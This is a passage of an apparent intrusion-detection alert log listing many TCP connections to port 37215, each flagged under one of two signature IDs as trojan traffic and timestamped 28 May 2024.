            SID:2835222
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822034
            SID:2835222
            Source Port:46238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736309
            SID:2829579
            Source Port:58752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058750
            SID:2835222
            Source Port:58040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.888671
            SID:2829579
            Source Port:52124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070053
            SID:2835222
            Source Port:45018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505353
            SID:2829579
            Source Port:50248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741457
            SID:2829579
            Source Port:44164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.665894
            SID:2835222
            Source Port:48032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725038
            SID:2835222
            Source Port:43400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704511
            SID:2829579
            Source Port:48208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855957
            SID:2829579
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824604
            SID:2829579
            Source Port:47278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858454
            SID:2829579
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.557791
            SID:2835222
            Source Port:33570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597073
            SID:2829579
            Source Port:60250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943840
            SID:2829579
            Source Port:43314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818706
            SID:2829579
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039850
            SID:2829579
            Source Port:43090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832485
            SID:2835222
            Source Port:44910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617617
            SID:2835222
            Source Port:41162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943275
            SID:2835222
            Source Port:56426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062543
            SID:2829579
            Source Port:37274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486867
            SID:2829579
            Source Port:49614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070213
            SID:2835222
            Source Port:36750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.671383
            SID:2829579
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834361
            SID:2829579
            Source Port:51094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924343
            SID:2829579
            Source Port:46688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039772
            SID:2835222
            Source Port:50004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.835581
            SID:2835222
            Source Port:53736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067371
            SID:2835222
            Source Port:39938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.626762
            SID:2835222
            Source Port:44462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917629
            SID:2829579
            Source Port:52874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.881060
            SID:2829579
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278219
            SID:2829579
            Source Port:60786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944307
            SID:2835222
            Source Port:55216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279645
            SID:2835222
            Source Port:47536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562159
            SID:2829579
            Source Port:38092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872681
            SID:2835222
            Source Port:40054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299939
            SID:2829579
            Source Port:44572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862686
            SID:2835222
            Source Port:45914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014844
            SID:2835222
            Source Port:38710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.862114
            SID:2829579
            Source Port:47378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180481
            SID:2829579
            Source Port:32776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861297
            SID:2829579
            Source Port:56634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459432
            SID:2835222
            Source Port:49976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.654955
            SID:2829579
            Source Port:50198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852818
            SID:2835222
            Source Port:38658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930456
            SID:2835222
            Source Port:41978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663993
            SID:2829579
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289576
            SID:2829579
            Source Port:38454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765953
            SID:2829579
            Source Port:46992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730764
            SID:2835222
            Source Port:50460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377852
            SID:2829579
            Source Port:59860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772033
            SID:2835222
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039054
            SID:2829579
            Source Port:45640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814287
            SID:2835222
            Source Port:53504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935506
            SID:2829579
            Source Port:49842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457603
            SID:2835222
            Source Port:53274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930873
            SID:2835222
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059876
            SID:2829579
            Source Port:60256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318087
            SID:2835222
            Source Port:37956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663824
            SID:2829579
            Source Port:44108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850544
            SID:2829579
            Source Port:58308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038378
            SID:2829579
            Source Port:38718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955739
            SID:2829579
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045851
            SID:2829579
            Source Port:45706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047874
            SID:2835222
            Source Port:33914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251890
            SID:2829579
            Source Port:41300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892565
            SID:2829579
            Source Port:57424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002320
            SID:2835222
            Source Port:58070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853263
            SID:2835222
            Source Port:51798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808603
            SID:2829579
            Source Port:57984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532503
            SID:2835222
            Source Port:59126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789112
            SID:2835222
            Source Port:49280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445267
            SID:2835222
            Source Port:35380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818322
            SID:2835222
            Source Port:45538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524300
            SID:2835222
            Source Port:59532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943749
            SID:2835222
            Source Port:47344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294093
            SID:2835222
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901258
            SID:2829579
            Source Port:34268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999160
            SID:2835222
            Source Port:57988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884533
            SID:2829579
            Source Port:60068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2829579
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.587230
            SID:2835222
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639310
            SID:2835222
            Source Port:52346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944164
            SID:2835222
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707664
            SID:2835222
            Source Port:59980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871216
            SID:2835222
            Source Port:41724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774033
            SID:2829579
            Source Port:50108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575469
            SID:2829579
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277117
            SID:2835222
            Source Port:56366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681268
            SID:2829579
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842698
            SID:2829579
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222009
            SID:2829579
            Source Port:46280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924929
            SID:2829579
            Source Port:56684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930147
            SID:2829579
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.970318
            SID:2829579
            Source Port:60500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555407
            SID:2835222
            Source Port:37904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729347
            SID:2835222
            Source Port:40444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715258
            SID:2829579
            Source Port:41758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563436
            SID:2829579
            Source Port:57178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.560500
            SID:2835222
            Source Port:36430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777462
            SID:2829579
            Source Port:35276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861346
            SID:2829579
            Source Port:46994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995842
            SID:2829579
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026620
            SID:2829579
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644064
            SID:2835222
            Source Port:55404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766751
            SID:2829579
            Source Port:43532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859685
            SID:2835222
            Source Port:42732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639926
            SID:2835222
            Source Port:55688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222036
            SID:2829579
            Source Port:58938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.356784
            SID:2829579
            Source Port:42994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817397
            SID:2829579
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027592
            SID:2829579
            Source Port:34068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.335898
            SID:2835222
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925580
            SID:2829579
            Source Port:58264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809124
            SID:2835222
            Source Port:57890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421412
            SID:2829579
            Source Port:52572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922433
            SID:2829579
            Source Port:55890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776953
            SID:2835222
            Source Port:52214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871674
            SID:2829579
            Source Port:53472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274904
            SID:2829579
            Source Port:36478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559943
            SID:2835222
            Source Port:59748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055994
            SID:2829579
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.024519
            SID:2835222
            Source Port:48804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060149
            SID:2835222
            Source Port:54792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929521
            SID:2835222
            Source Port:59738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289385
            SID:2835222
            Source Port:42470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705122
            SID:2835222
            Source Port:57432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004693
            SID:2829579
            Source Port:56004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850166
            SID:2829579
            Source Port:52240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842844
            SID:2835222
            Source Port:59470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856427
            SID:2835222
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807113
            SID:2829579
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849610
            SID:2829579
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454314
            SID:2829579
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000960
            SID:2835222
            Source Port:50554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.798600
            SID:2835222
            Source Port:33084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026377
            SID:2829579
            Source Port:32852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357438
            SID:2835222
            Source Port:37966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651642
            SID:2829579
            Source Port:54668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003034
            SID:2829579
            Source Port:41456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.816109
            SID:2829579
            Source Port:37990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812474
            SID:2829579
            Source Port:49176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809683
            SID:2829579
            Source Port:55778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581188
            SID:2829579
            Source Port:50964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394469
            SID:2835222
            Source Port:48944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855462
            SID:2829579
            Source Port:37172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038032
            SID:2835222
            Source Port:45456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073297
            SID:2835222
            Source Port:46048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516608
            SID:2835222
            Source Port:42878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739105
            SID:2829579
            Source Port:33046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412808
            SID:2829579
            Source Port:46120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696032
            SID:2835222
            Source Port:43250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443278
            SID:2829579
            Source Port:50678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929572
            SID:2835222
            Source Port:51352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922246
            SID:2829579
            Source Port:51706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557074
            SID:2835222
            Source Port:49626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020168
            SID:2835222
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376805
            SID:2835222
            Source Port:34904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869555
            SID:2829579
            Source Port:45980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988272
            SID:2829579
            Source Port:60530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.356366
            SID:2829579
            Source Port:51780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872662
            SID:2829579
            Source Port:39020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.771804
            SID:2829579
            Source Port:60660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712262
            SID:2829579
            Source Port:58332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714657
            SID:2835222
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870088
            SID:2835222
            Source Port:44326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805900
            SID:2829579
            Source Port:40606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842917
            SID:2835222
            Source Port:39822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929435
            SID:2829579
            Source Port:46610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471312
            SID:2835222
            Source Port:53734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026016
            SID:2835222
            Source Port:55810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623370
            SID:2829579
            Source Port:46460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086465
            SID:2829579
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.423783
            SID:2835222
            Source Port:58492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000437
            SID:2835222
            Source Port:35322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.847105
            SID:2829579
            Source Port:50114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811073
            SID:2835222
            Source Port:50454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926196
            SID:2829579
            Source Port:40326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968192
            SID:2835222
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922971
            SID:2829579
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755050
            SID:2835222
            Source Port:48836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475555
            SID:2829579
            Source Port:49026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877769
            SID:2835222
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733489
            SID:2829579
            Source Port:58408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922409
            SID:2835222
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759256
            SID:2835222
            Source Port:45422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563252
            SID:2835222
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532744
            SID:2835222
            Source Port:59884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680089
            SID:2829579
            Source Port:60280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065086
            SID:2829579
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.829412
            SID:2829579
            Source Port:35360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721432
            SID:2829579
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820760
            SID:2829579
            Source Port:55090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.431934
            SID:2835222
            Source Port:37714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927138
            SID:2835222
            Source Port:45966
            Destination Port:37215
